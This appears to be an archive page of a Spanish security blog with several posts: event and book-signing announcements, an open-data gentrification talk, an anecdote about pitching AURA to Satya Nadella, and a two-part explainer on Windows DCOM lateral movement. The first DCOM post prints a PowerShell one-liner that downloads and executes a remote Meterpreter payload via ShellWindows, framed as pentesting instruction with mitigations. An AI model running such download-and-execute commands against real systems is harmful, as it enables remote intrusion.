jueves, febrero 21, 2019

MorterueloCON: Hack&Beers, X1Red+Segura y @0xWord

Como sabéis, vamos a colaborar en la próxima MorterueloCON que tiene un cartel muy ambicioso. En ella, desde este jueves un Hack&Beers, el viernes y sábado el plato fuerte de las charlas y el sábado también una edición de X1Red+Segura de nuestro amigo Angelucho. Y ademas, estará presente 0xWord on un stand de libros donde podréis comprar vuestros ejemplares, podréis llevaros las firmas de algunos autores que hablan en las charlas y podréis conseguir gratis algún ejemplar con el sorteo que han hecho.

Figura 1: MorterueloCON: Hack&Beers, X1Red+Segura y @0xWord

El stand lo tendréis disponible durante todas las charlas, y hemos organizado las siguientes jornadas de firmas para vosotros. El viernes, de 11:50 a 12:30, tendréis para firmar libros a dos grandes autores de 0xWord. En primer lugar Pablo González Pérez (@pablogonzalezpe), escritor de los libros "Metasploit para Pentesters", "Hacking con Metasploit: Advanced Pentesting" "Hacking Windows", "Ethical Hacking", "Got Root" y “Pentesting con Powershell”.

Figura 2: Hacking con Metasploit: Advanced Hacking
Y el segundo de los autores será Daniel Echeverri, autor de tres libros de los más demandados. El primero de ellos Python para Pentesters, que es un "must" para entrar en el mundo del Ethical Hacking. El segundo de ellos para sacar partido más allá a este lenguaje, que se llama "Hacking con Python", y el último sobre temas más que interesantes "Deep Web: TOR, FreeNET & I2P - Privacidad y anonimato".

Figura 3: Hacking con Python

Por último, el viernes, de 18:15 a 18:45 estará en el stand para firmaros su ejemplar David Meléndez (@taiksontexas). Como sabéis, David es un hacker que se especializó en los drones y reventó la DefCon con sus trabajos para weaponizar y sacar el máximo partido a la tecnología dron, y en su libro "Hacking con Drones: Love is in the Air" explica cómo funcionan y cómo se les puede sacar el máximo de partido.

Figura 4: Hacking con Drones: Love is in the air

Y para animar el congreso se ha puesto un sorteo de libros de 0xWord al que puedes participar ya, con las siguientes condiciones:


Y si el ganador elige uno de mis libros, yo prometo ponerle en la firma un No Lusers de los míos, para que tenga un buen recuerdo.

Saludos Malignos!

miércoles, febrero 20, 2019

El movimiento lateral a través de DCOM [2]: DCOMrade para detectar debilidades en DCOM

En la primera parte de este artículo hablamos de cómo se podía utilizar un componente DCOM con el atributo de ShellWindows para hacer una movimiento lateral en un proceso de Ethical Hacking, para poder, usando Powershell, ejecutar remotamente una consola de Meterpreter. Hoy vamos a ver una herramienta que ayuda a encontrar los DCOM que pueden ser utilizados.

Figura 8: El movimiento lateral a través de DCOM [2].
DCOMrade para detectar debilidades en DCOM

DCOMrade es un script que permite enumerar posibles aplicaciones vulnerables DCOM que puedan permitir el movimiento lateral, ejecución de código o, incluso, la exfiltración de datos. El script trabaja desde Powershell_v2 y puede ser ejecutado en diferentes versiones de Windows, desde la 7 hasta la 10, y las versiones servidores consecuentes, por lo que es perfecto para añadir a las técnicas de Pentesting con PowerShell de las que hemos hablado tanto.

Figura 9: Pentesting con Powershell

He querido probar la herramienta y ver las posibilidades, y me dio un aire a UAC-A-Mola y su parte dedicada a la investigación de los bypasses de UAC. Como se puede ver en la imagen, se lanza el script y se pedirá una serie de opciones. Otra opción es ejecutar el script e ir indicando los diferentes parámetros con el “-“.

Figura 10: Script de DCOMrade en GitHub

Nos pedirán datos sobre el target, sobre el usuario y sobre el sistema operativo, y en caso de ser necesario, datos sobre la contraseña. Hay que tener en cuenta que esto es para recapitular posibles DCOM que permitan hacer movimiento lateral, si hemos accedido al sistema y tenemos, por ejemplo, un Meterpreter no necesitaríamos la contraseña en ningún caso.

Figura 11: Ejecución de DCOMrate

Una vez que podemos ejecutar el script en la máquina empezamos a obtener los resultados en diferentes ficheros de texto, incluso un HTML que nos pinta la información de forma más atractiva. Este proceso puede tardar un tiempo.

Figura 12: Analizando los componentes DCOM

Como comenté, el listado de archivos es variado, dónde se pueden encontrar las aplicaciones y los CLSID potencialmente vulnerable y que se pueden probar con el objetivo de utilizar alguna de las técnicas conocidas para lograr ese movimiento lateral a partir de los CLSID.

Figura 13:  Fichero de resultados

Por último, y para ver lo que se puede ver en el fichero HTML vemos la siguiente imagen. En ella se puede ver una tabla representando la información. Hay varios apartados que son reflejados, cada uno refleja información de los diferentes ficheros que hemos podido ver antes.

Figura 14: Listado de los componentes DCOM detectados como útiles 

Sin duda, una técnica moderna e interesante, junto a las otras opciones que existen para llevar a cabo movimiento lateral a través de DCOM. Seguiremos contando este tipo de técnicas, más que interesantes.

Autor: Pablo González Pérez (@pablogonzalezpe), escritor de los libros "Metasploit para Pentesters", "Hacking con Metasploit: Advance Pentesting" "Hacking Windows", "Ethical Hacking", "Got Root" y “Pentesting con Powershell”, Microsoft MVP en Seguridad y Security Researcher en el equipo de "Ideas Locas" de la unidad CDO de Telefónica.

martes, febrero 19, 2019

El movimiento lateral a través de DCOM [1]: Técnica Shell Windows

Hace bastante tiempo que quería hablar sobre este tema que me parece muy interesante en lo que a técnicas de movimiento lateral se refiere. Si sigues el trabajo de investigadores como Matt Nelson, el equipo de SpecterOps, Ryan Hanson o el blog de Cybereason entenderás que se destapó una nueva Caja de Pandora. ¿Por qué? Sencillo, se conocen diferentes técnicas de movimiento lateral, las cuales son cada vez más estudiadas y se intenta mitigar el impacto de éstas en un escenario de Ethical Hacking.

Figura 1: El movimiento lateral a través de DCOM [1]: Técnica Shell Windows


En el caso de la extensión DCOM se abrió, como he dicho antes, una auténtica Caja de Pandora por la gran cantidad de escenarios de ataque que se puede dar. Y todo ello está enfocado a evaluar la seguridad y realizar ataques contra sistemas Windows, algo de lo que hemos estudiado y escrito, como podéis leer en el libro de Hacking Windows: Ataques a Sistemas y Redes Microsoft.

Figura 2: Hacking Windows. Ataques a sistemas y redes Microsoft

Existen varias técnicas que se aprovechan de los DCOM, de las cuales Matt Nelson es el autor de la mayoría de ellas, para conseguir ejecutar el movimiento lateral y ejecutar el código que más nos interese en un momento determinado. Este tipo de técnicas tienen un gran interés, ya que son más desconocidas y el efecto es el mismo que el que puede lograr un Pass the hash, un Pass the ticket, el uso de WMI, WinRM o el uso de PSExec.

En el presente artículo se quiere mostrar el potencial de los DCOM para lograr hacer movimiento lateral y una herramienta llamada DCOMrade (que veremos en el post de mañana)  que ha salido para buscar esos DCOM y CLSID potencialmente vulnerables. Este tipo de herramienta puede tener un parecido con nuestro UAC-A-Mola, cada uno en su temática y evaluación de protección en Windows.

DCOM: Distributed Component Object Model

Lo primero es hablar de cómo funciona y qué es un DCOM. El objetivo está claro, poder utilizar este tipo de técnicas para lograr movernos lateralmente a otra máquina. Un DCOM es una extensión de COM, un Component Object Model, los cuales van a permitir instanciar y acceder a las propiedades y métodos de objetos COM sobre una máquina remota.

Por otro lado, debemos entender que es un CLSID, ya que se va a utilizar. Un CLSID es Class Identifier. Es un GUID, el cual va a ser único en el sistema e identificará a una clase COM. Cada clase que se registre en Windows ese asociará con un CLSID.

Otros conceptos que debemos entender son el ProgID y el AppID. El ProgID es Programmatic Identifier, el cual es utilizado como un User-Friendly al CLSID. Por ejemplo, para el CLSID XXXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXX se le puede llamar, de modo más amigable, System.AppDomainManager. El AppID es Application Identifier, el cual es utilizado para especificar la configuración de uno o N objetos COM asociados al mismo ejecutable.

Figura 3: Comando Get-CimInstance Win32_DCOMApplication

Esto incluye los permisos y grupos para instanciar y acceder a las clases asociadas. Con el comando de Powershell (más vale que domines el Pentesting con Powershell si quieres meterte en el mundo del hacking de WindowsGet-CimInstance Win32_DCOMApplication que se puede ver en la Figura 3 podemos listar el nombre y el AppID asociado.

Entendiendo la técnica ShellWindows

Como he comentado anteriormente, existen diferentes técnicas que pueden ser utilizadas para lograr el objetivo, dentro del mundo DCOM. En este caso vamos a tratar la denominada ShellWindows.

Matt Nelson descubrió que cuando listaba diferentes DCOM aplicaciones aparecía MMC Application Class o MMC20.Application. Este objeto COM permite interactuar con diferentes componentes y operaciones de los Snap-In de MMC, por ejemplo, certificados, visor de eventos, etcétera. El investigador se dio cuenta que existía un método llamado ExecuteShellCommand. Lo importante será descubrir objetos que no tienen el valor LaunchPermission. Por ejemplo, si utilizamos el registro en la ruta HKCR:\AppID encontraremos una gran cantidad de CLSID.

Figura 4: CLSID con instancia ShellWindows sin ProgID asociado

En la Figura 4 se puede ver un CLSID y la instancia ShellWindows. Este objeto no tiene ProgID asociado, por lo que se puede utilizar el método Type.GetTypeFromCLSID y luego utilizar el Activator.CreateInstance para instanciar el objeto a través de su CLSID en un equipo remoto.

Figura 5: Instanciación remota de objeto

Como se puede ver en la Figura 5, se utiliza GetTypeFromCLSID para, partiendo del CLSID, instanciar el objeto en el equipo remoto. Esto ocurre cuando se ejecuta el CreateInstance. Si observamos el objeto que se obtiene se puede descubrir que podemos ejecutar a través del método ShellExecute.

Figura 6: Ejecución vía objeto DCOM

En el siguiente ejemplo, se puede ver cómo se ejecuta una calculadora en la máquina remota, pero esto ya demuestra que se puede ejecutar acciones remotas, por lo que se podría ejecutar código que nos interese en la máquina remota.

Ejecutando un Meterpreter

Como ya hemos visto podemos ejecutar cualquier programa remotamente vía este método, por lo que podemos ejecutar un Meterpreter a través del uso de Powershell que es un truco Level 100 del Pentesting con Powershell y que puedes ver en uso dentro del PoC de cómo hicimos PSBot. La modificación es mínima frente a lo anterior. Dónde poníamos los parámetros del cmd.exe lo cambiaríamos por lo siguiente:
c:\windows\system32\windowspowershell\v1.0\powershell.exe –C iex(new-object net.webclient).downloadstring(‘http://…’)
El resultado se puede ver en el siguiente vídeo que hemos grabado para que sea más visual verlo funcionando.


Figura 7: Ejecutando Meterpreter vía ShellWindows en DCOM

Como se puede ver es una técnica sencilla e interesante. Hay que indicar que la técnica tiene una serie de restricciones si nos encontramos ante un Windows Fortificado. Si el firewall de Windows está activo puede bloquear este tipo de tráfico, por lo que su mitigación es sencilla. Otra opción para protegerse es deshabilitar DCOM. En la segunda parte de este artículo vamos a ver la herramienta DCOMrade para sacar más partido a estas técnicas.

Autor: Pablo González Pérez (@pablogonzalezpe), escritor de los libros "Metasploit para Pentesters", "Hacking con Metasploit: Advance Pentesting" "Hacking Windows", "Ethical Hacking", "Got Root" y “Pentesting con Powershell”, Microsoft MVP en Seguridad y Security Researcher en el equipo de "Ideas Locas" de la unidad CDO de Telefónica.

lunes, febrero 18, 2019

Open Data y el análisis de la transformación de los barrios de Madrid y New York

La semana pasada, nuestro compañero Luis Nadal de la unidad LUCA de Telefónica, hizo un seminario online en el que explicaba cómo se pueden utilizar los datos abiertos que ofrecen dos ciudades como Madrid o New York para hacer un análisis de la transformación que han sufrido sus barrios.

Figura 1: Open Data y el análisis de la transformación de los barrios de Madrid y New York

El análisis de gentrificación para conocer cómo han mejorado o no los barrios de las ciudades de Madrid y New York es un ejercicio de Analítica Descriptiva en el que utilizando un modelo de entrenamiento no supervisado de clusterización de barrios en función de diferentes variables, va a mostrar el estado comparable de cada barriada.

Figura 2: Análisis de barrios en Madrid

El ejercicio está explicado en una presentación de cuarenta minutos que he subido a mi canal de Youtube, y que también tenéis en el Canal de Youtube de LUCA - donde tenéis muchos más ejemplos - y tiene conclusiones muy interesantes.


Figura 3: LUCA Talk: Análisis de gentrificación en Madrid y New York con Open Data

La más curiosa es cómo algunas variables no son de relevancia cuando se aplican en Madrid, pero que sí son muy relevantes cuando se aplican en la ciudad de New York. Esto deja claro cómo la idiosincracia de ambas ciudades es totalmente diferente.

Figura 4: Resultado del clustering de barrios en New York

Las LUCA Talks son sesiones impartidas online a las que puedes asistir de forma gratuita y periódica. Si te ha parecido interesante este tema, puedes suscribirte al blog de Data Speaks donde se anuncian todas las que se van a hacer y revisar todas las ya publicadas en la web de las LUCA Talks.

Saludos Malignos!

domingo, febrero 17, 2019

La historia de cómo expliqué AURA a Satya Nadella cuando solo era un dibujo

Intento recordar todas las anécdotas de mi vida. Las atesoro. He tenido la suerte de que la vida me ha regalado momentos muy curiosos y especiales. Anécdotas como aquellas que guardaba tiempo atrás de  mis "Momentus Ridiculous" en las conferencias hace más de diez años cuando me disfrazaba de cosas, o como las que voy viviendo desde que llegué a Telefónica. Hoy os quiero dejar una de hace casi tres años que fue muy importante para mí.

Figura 1: La historia de cómo expliqué AURA a Satya Nadella cuando solo era un dibujo

Cuando se hizo público que era el nuevo Chief Data Officer del grupo Telefónica hubo mucho revuelo. Mucho más de lo que imaginaba. Al final yo venía del mundo de las bases de datos, sabía de seguridad, y lo más importante, tenía ganas de construir tecnología con un nuevo reto. Así que… ¿por qué no? Lo hablé con algunos compañeros de mi equipo, y al final nos pareció bien a todos, así que... let´s do it.

De CDO a Silicon Valley

Tenía que construir algo que llamábamos internamente la 4ª Plataforma, y debía decidir qué y cómo lo iba a hacer. Tras el ruido inicial decidieron que fuera a hablar con Andreu Buenafuente a un Late Motiv para explicar con normalidad mi rol en el puesto - y devolverle la imitación que me hizo -. Pero aún estaba lejos de acabar de entender todos los detalles de lo que suponía el trabajo que me tocaba como CDO.


Figura 2: Entrevista con Andreu Buenafuente ya como CDO

El tiempo no es infinito, así que empezamos a andar lo más rápido que pudimos con un plan en mente. Lo he contado muchas veces. La famosa Margarita que nos servía para explicar cómo pensábamos normalizar los datos en un modelo URM para construir tecnología unificada en todo el grupo. Datos normalizados incentivados por casos de uso (las "joyas") que sacasen lo mejor del Machine Learning y los Data Scientist. Nada "Rocket Science" si no fuera para la complejidad y la escala que tiene una multinacional con infinitos sistemas. Esa Margarita es siempre una protagonista de la que hablo en todas las charlas en las que tengo que explicar mi trabajo.


Pero también teníamos que hacer más cosas. Teníamos que lanzar la unidad de Big Data & AI para el grupo TelefónicaLUCA. Y lo que era mejor aún – o más difícil -. Aún no habíamos dado con la clave - y con todas las piezas tecnológicas más la estrategia táctica de ejecución - que nos permitiera implementar la visión que tenían en la cabeza tanto nuestro Presidente como el Comité Ejecutivo del grupo de lo qué debería ser la 4ª Plataforma. Os garantizo que en esos momentos, compañeros como Guillermo Ansaldo, Enrique Blanco, Gonzalo Martín-Villa o Antonio Marti, fueron apoyos enormes para mí a la hora de entender el "qué" y el "cómo". Recuerdo una caminata con Don Guillermo Ansaldo que fue mejor que ir a estudiar un Máster.

Así que, después de haber fallado explicándole a mi jefe un viernes lo que pensábamos hacer, me pasé todo el fin de semana dándole vueltas a cómo hacer real la visión que había sobre esta Cuarta Plataforma. Necesitábamos las piezas tecnológicas y la estrategia de ejecución. Necesitábamos dar con las tuberías y el libro de instrucciones de cómo montar "el juguete". Y en Julio de 2016 aún no lo teníamos.

Pero ese fin de semana, al final, me di cuenta que lo que nos exigía este proyecto era construir un sistema completo que tuviera los Datos, más los Personal Data Spaces de los usuarios, con sus datos generados y sus insights, que permitiera abordar la creación de un PIM (Personal Information Manager) que soportara GDPR desde el diseño, con la posibilidad de portar los datos, gestionar consentimientos, y que toda interacción se pudiera hacer con Lenguaje Natural usando Cognitive Services y modelos de AI. Y así nació Y.O.T. (You On Telefónica). Lejos quedaba aún el nombre de AURA. Pero en esencia era eso. Así que volví con un dibujo el lunes que he mostrado muchas veces y que compartí con mis compañeros en la sala de Frozen.




A post shared by Chema Alonso (@chemaalonso) on

Ese dibujo, donde se puede ver que necesitábamos APIs, procesos ETL, normalizar datos con URM, crear modelo de gobernanza, etcétera. Era mi plan para ganar la partida. Había que hacerlo y punto. Y yo soy un “Doer” y mi equipo también. Es lo que se nos da bien. Pensar cómo hacer cosas y luego... hacer cosas. Si hay que hacer algo, pensamos cómo hacerlo y lo hacemos. Yo en concreto debo de ser como ese “vago” que dice Bill Gates que hay que buscar. Ese al que le dan tareas muy complicadas para que busque la forma más sencilla de hacerlo. Ese soy yo. Era tan vago en la universidad que estudiaba todos los días porque descubrí que era la manera en la que menos esfuerzo tenía que invertir.

Figura 5: Elige un vago.

Nos encargaron hacer LUCA y la 4ª Plataforma, y nos pusimos a ello sin perder un minuto. Reorganicé la unidad CDO a mi modo. Con el equipo de Brand eXperience y el de CTO transversales, con los equipos que hacían tecnología con Big Data y Machine Learning que generaban dinero dentro de LUCA y los que hacían trabajos de datos para nosotros internamente dentro de la 4ª Plataforma. Más, por supuesto, ElevenPaths que venía en el equipo. Y empezamos a andar. Y fue duro al principio. Pero yo tenía claro que si había que hacerlo se iba a hacer.

Pero de momento sólo eran ideas en un papel. En una servilleta concretamente que es donde yo suelo dibujar. El número de cosas importantes que he hecho primero una servilleta de papel en una cafetería es altísimo. Os sorprendería. Desde mi vida de estudiante hasta Y.O.T. o el diseño de Network Tokenization (ya os contaré como con una servilleta en un Starbucks convencí a uno de otra empresa para que se metiera en el gran embrollo de su vida para venirse conmigo), o el mismo logo de i64 que diseñamos Rodol y yo hace años.

El viaje a Microsoft Corporation en Agosto de 2016

Y así llegamos a ese Agosto de 2016 a Silicon Valley y a Seattle. Un grupo de compañeros de Telefónica que íbamos a conocer de primera mano hacía donde se movía ese verano el mundo tecnológico. Esos viajes a USA nos ayudan mucho. En una semana aprendemos, concretamos, y elaboramos planes de futuro. Pero ese era el primero y aún estábamos construyendo pilares dentro de la casa para abordar la revolución en la que nos íbamos a meter. Y yo solo tenía mi dibujo en la servilleta.

Pero al final resultó que una de las empresas que visitamos decidió invertir trabajo en nosotros y ayudarnos más que ninguna otra para el punto concreto que necesitábamos en ese momento. Y todo surgió de una reunión que nunca se me olvidará por lo que significó para nosotros. Fue la reunión en Redmond, en los cuarteles generales de Microsoft, con Satya Nadella y su equipo, de la que salió la colaboración que necesitábamos para construir AURA.

Ya habíamos estado en el Mobile World Congress 2015 cenando con Satya Nadella, donde aproveché para hacerme una foto con él. La primera de la colección. Aquella noche hablamos de cosas chulas de tecnología, y la cena fue interesante. Satya y José María entienden bien la tecnología, por lo que las conversaciones no suelen ser de pájaros y flores. Siempre amenas. Allí hablamos de Hololens. De datos. Del futuro de la A.I. que vendría y la enhanced reallity. De dispositivos móviles y del negocio de las telcos.


A la reunión que tuvimos ese Agosto de 2016 fuimos de nuestro lado José María, José Cerdán – que pocos saben que es uno de los padres intelectuales de LUCA y culpable tanto del nombre como de que la hiciéramos -, la increíble e inigualable Guenia que siempre aporta el punto de innovación a lo que hacemos, y yo, que tenía que contar qué íbamos a hacer.

Figura 7: Los badges de ese día para Telefónica

Desde España se vino también el equipo de cuenta de Microsoft, con Pilar López a la cabeza, que se pegó por este proyecto con ahínco y pasión, Juan Troytiño que nos ayudó a conseguir mover todos los resortes para mantener la relación entre las dos compañías por encima de las dificultades que dos empresas tan grandes suelen encontrarse, y David Cervigón, amigo y arquitecto Cloud, con una visión única. Él sabía en qué y cómo nos podían ayudar.

Figura 8: Comitiva de Microsoft España preparando la reunión

Desde Microsoft Corp se unieron pesos pesados de la compañía, pero vino a la cabeza el propio Satya Nadella, junto con Peggy Johnson, Lili Cheng o el gran Gurpreet Pall. Para que os hagáis una idea, Peggy nos estuvo apoyando en el lanzamiento del MWC del 2017 y Gurpreet Pall en el 2018. Y todo surgió en aquella reunión de la que os estoy hablando en Agosto de 2016.

Figura 9: Los badges de todos los miembros de Microsoft que nos atendieron ese día

Y ahí estaba yo en el momento que me tocaba explicar lo que sería AURA en el futuro sobre la 4ª Plataforma. Con diez minutos para hablar delante de Satya Naella, el CEO de una de las empresas más grandes de la historia de la tecnología, y contarle lo que íbamos a hacer, cuándo lo íbamos a hacer y lo que necesitabamos de Microsoft. Sí, yo estaba un poco nervioso también pensando que en aquel entonces solo tenía la pizarra y un rotulador para conseguir todo.

¿Y qué le conté a Satya?

Pues con toda la crudeza que pude, le conté eso, lo que íbamos a construir. De la misma manera que se lo conté a mis compañeros cuando regresé aquel fin de semana. Con mi dibujo. Se lo hice ahí, en una pizarra blanca de la sala. Lo dibujé y lo expliqué. Cada cosa. Con sus plataformas. Sus Personal Data Spaces. Su Y.O.T. Su todo. No llevé una presentación en Power Point. No llevé un vídeo. Nada. Solo dibujé y le conté lo que en Telefónica íbamos a lanzar... cuando estuviera acabada la primera versión. No necesité nada más para explicárselo a mis compañeros. No me preparé nada más para explicárselo a Satya. De hecho, no tenía nada más que el dibujo y la convicción de que estaría hecho. Estaba seguro que lo íbamos a construir. Así que… ¿por qué más si en lo que consistía era justo eso?.

Figura 10: Con Juan Troytiño el día de la reunión

Las fotos del momento las conservaban Juan Troytiño y David Cervigón, y en ellas se puede ver a Pilar López, a José María, a Guenia, el turbante de Gurpreet y el que no sale en la foto justo a la derecha es Satya Nadella. Por supuesto, el de la camiseta de Superman roja sin gorro, soy yo.


Yo terminé mi dibujo, lo más rápido que pude. Explicando las piezas tecnológicas, las capas de abstracción, la normalización de los datos, la parte del bot, la parte de los servicios cognitive, dónde iba a gestionar los insights, etcétera. En esta foto se ve cómo quedó al final en la pizarra.

Figura 12: El YOT sobre la 4P que le hice a Satya en Redmon

Y bastó. Fue suficiente. La idea le gustó. Y creyó en que lo haríamos. Así que Satya Nadella nos dijo que contáramos con ellos para el MWC 2017. Y Peggy Johnson nos ayudó con lo que fuimos necesitando. Y Pilar López movilizó a sus ingenieros para que nos echaran un cable. Y Juan Troytiño nos ayudó con las Hololens, y David Cervigón con LUIS, Bot Framework, etcétera. Y Peggy Johnson se subió en aquella primera presentación en la que yo usé las Hololens para presentar el prototipo de AURA. Y luego lo contamos en un vídeo.


Figura 13: Vídeo de AURA con Microsoft

Ahora, que AURA es una realidad que no para de crecer, que está ya en Movistar Home, y que va a pegar un nuevo salto en el próximo Mobile World Congress, siento un vacío en el estómago cuando recuerdo cómo nació todo. Cuando recuerdo que en aquella reunión estábamos ante un momento que tendría una importancia vital en el futuro de Telefónica y el mío propio. Cuando recuerdo que para Satya Nadella ver mi dibujo y escuchar a los cuatro que fuimos, fue más que suficiente para apostar por este proyecto me da un poco de vértigo. Pero fue verdad. Y lo hicimos. Y nos vino genial el apoyo de Satya y su compromiso de que Microsoft estaría con nosotros en el MWC de 2017.


Figura: 14: Movistar Home con AURA para gestionar la TV

Y por eso volvimos a vernos en Agosto de 2017 y en Agosto de 2018 para tener la misma reunión pero con otros temas. Con otros proyectos de futuro. En estas dos últimas ediciones hablamos de Movistar Home, de privacidad, Data EconomyNetwork Tokenization, de Contact Centers, de BlockChain, Quantum Computing, muchas cosas. Y de todas ellas me llevo una frase que nos dijo Satya Nadella en la última reunión:
“You guys say you are going to do something, and you do it”.
Y para mí, todo comenzó con un dibujo. Y he de decir que en las reuniones de 2017 y 2018 me prepararon los rotuladores y la pizarra para que pudiera dibujar más, si tenía que explicar cosas nuevas.

Saludos Malignos!

sábado, febrero 16, 2019

El post con la agenda de actividades de la semana

Como vengo haciendo muchos fines de semana, el sábado es el día que os traigo la agenda de actividades de la semana. Eventos, charlas, cursos, debates y demás saraos a los que puedes apuntarte si te apetece hacer algo para aprender.

Figura 1: El post con la agenda de actividades de la semana

Además de todo lo que pongo aquí, recuerda que durante estos días atrás se ha anunciado el Curso gratuito de SQL en el Instituto Tecnológico Telefónica que puedes hacer antes de entrar en el mundo del Hacking de Aplicaciones Web tal y como entré yo, por las técnicas de SQL Injection de las que luego publicamos un libro (que va ya por su tercera edición).

Lunes 18 de Febrero: Curso de Hacking con Python [Online]
Para formarse en cómo utilizar el popular lenguaje Python para el mundo del pentesting y poder utilizarlo en proyectos de Ethical Hacking. Una formación online de 90 horas que además va acompañada del libro de 0xWord que escribió Daniel Echeverry. Tienes información y los contenidos detallados de la formación en la web del curso.
Figura 2: Hacking con Python

Lunes 18 a Jueves 21 de Febrero: Seguros Field Trip [Madrid]
Web: Field Trip Madrid 2019
Una iniciativa apoyada por Evenet, y diseñada en dos días de visitas a algunas de las empresas más disruptivas de la industria de aseguradoras y corredores en España, para identificar y desarrollar oportunidades de crecimiento en un mercado que será totalmente distinto en los próximos cinco años. Un encuentro orientado a educar, apoyar y conectar el liderazgo de la industria gracias a la participación de oradores como el Dr. Richard Benjamins, Data & IA Ambassador en LUCA, quien repasará el espacio de big data e inteligencia artificial en términos de negocios, riesgos y desafíos.
Martes 19 de Febrero: El mundo tal y como es por Ben Rhodes [Madrid]
Web: Fundación Telefónica
“Así es como fue mi vida durante el primer año, después de tomar posesión de mi cargo. A veces el teléfono sonaba en plena noche. A las dos, a las tres de la madrugada. Descolgaba y oía el siguiente mensaje: ‘Aquí la Sala de Crisis de la Casa Blanca, llamando al señor Rhodes'”. Ben Rhodes era un aspirante a escritor que empezó a redactar discursos para un joven senador con ambiciones presidenciales en 2006. Salió de la casa Blanca diez años más tarde, tras haber vivido en primera línea de la política internacional toda la convulsa presidencia de Barack Obama.
Jueves 21 de Febrero: TIC Forum [México]
Web: Agenda y registro de TIC Forum México
Un año más Telefónica Business Solutions organiza el TIC Forum 2019 en México con una agenda enfocada en la importancia de la Transformación Digital para el país y las empresas y el potencial que ofrece el Big Data, siendo Telefónica pionera en aplicar tecnologías de Inteligencia Artificial (IA) como Machine Learning y Deep Learning que, combinados con nuestras capacidades de consultoría, infraestructura y analítica avanzada, convirtiendo este flujo de información en datos de valor relevantes para los negocios.
Figura 3: TIC Forum 2019 en México

Elena Gil
, CEO de LUCA, participará en el evento con una ponencia sobre el gran potencial de los datos en todos los sectores y el equipo de los CSA de ElevenPaths también estará presente.
Jueves 21 de Febrero: DigitalXBorder [Zaragoza]
Web de información
Un programa de inmersión digital para CEOs, que se imparte en más de 25 ciudades por empresas líderes globales, entre ellos Telefónica, de la mano del Dr. Richard Benjamins, Big Data & AI Ambassador de la compañía. Una experiencia de aprendizaje intensiva que ofrece las herramientas clave para facilitar la toma de decisiones en un entorno digital en continua transformación.
Jueves 21 de Febrero: Terapia Génica [Madrid]
Web: Fundación Telefónica
Retomamos nuestro ciclo ‘El futuro x venir’ en 2019 con un evento centrado en una de las técnicas médicas que promete grandes avances en la curación de enfermedades: la terapia génica. Para ello, contaremos con la presencia de Krystof Bankiewicz y Russ Lonser, dos de los mayores especialistas internacionales en este campo, en un evento conducido por Pere Estupinyà. La terapia génica ha supuesto una revolución en la manera de abordar el tratamiento de las enfermedades genéticas, puesto que ha abierto un nuevo horizonte para curar enfermedades para las que hasta el momento solo existían tratamientos orientados a paliar sus síntomas.

Jueves 21 a Sábado 23: Hack&Beers, MorterueloCON y X1Red+Segura [Cuenca]
Web de información y registro: MorterueloCON 5ª Ed
Tres días de conferencias y hacking y con buenos ponentes en la ciudad de Cuenca. Una ocasión única para disfrutar de la buena comida, el hacking y unas cervezas en esta preciosa ciudad. Tienes toda la agenda de los tres eventos para revisar en la web de MorterueloCON.
Figura 4: Hack&Beers, MorterueloCON y X1Red+Segura

Viernes 22 de Febrero: Curso de Auditoría y Hacking Web [Online]
Web: Curso Online de Auditoría y Hacking Web en The Security Sentinel
El viernes de esta semana da comienzo una edición del curso de Hacking y Auditoria Web en The Security Sentinel con 100 horas de duración y tutorizado por la profesora Marta Barrio en el que se tocan los temas fundamentales de esta profesión. Los alumnos recibirán el libro que escribimos entre varios sobre el Hacking Web Technologies, así que una oportunidad única para aprender muchos conceptos de esta profesión.
Figura 5: Hacking Web Technologies
Viernes 22 de Febrero: De la astrología a la IA "un viaje de cine" [Madrid]
La astrobiología es una ciencia joven que tiene como objeto la investigación sobre el origen, la evolución y la distribución de la vida en el Universo. Para ello, utiliza una aproximación transdisciplinar en la que colaboran diferentes disciplinas que incluyen matemáticas, física, química, geología, biología, ingeniería y computación. En particular, para los astrobiólogos el origen de la vida es un tema de investigación fascinante y complejo, que encierra preguntas de gran calado científico: ¿cuándo ocurrió?, ¿cómo?, ¿fue fruto del azar o de la necesidad?, ¿tuvo lugar solo una vez o varias?
Y esto es todo lo que tengo en el radar, aunque seguro que hay muchas más cosas que se me escapan. En cualquier caso, algunas opciones para llenar un poco más vuestra semana. Y ahora, a disfrutar el asueto de descanso.

Saludos Malignos!

Entrada destacada

Seis recomendaciones personales de libros de @0xWord para disfrutar y aprender

Este verano pude disfrutar de la lectura de un libro que me encantó. El libro de Factfulness que me había regalado mi compañera Beatriz Ce...

Entradas populares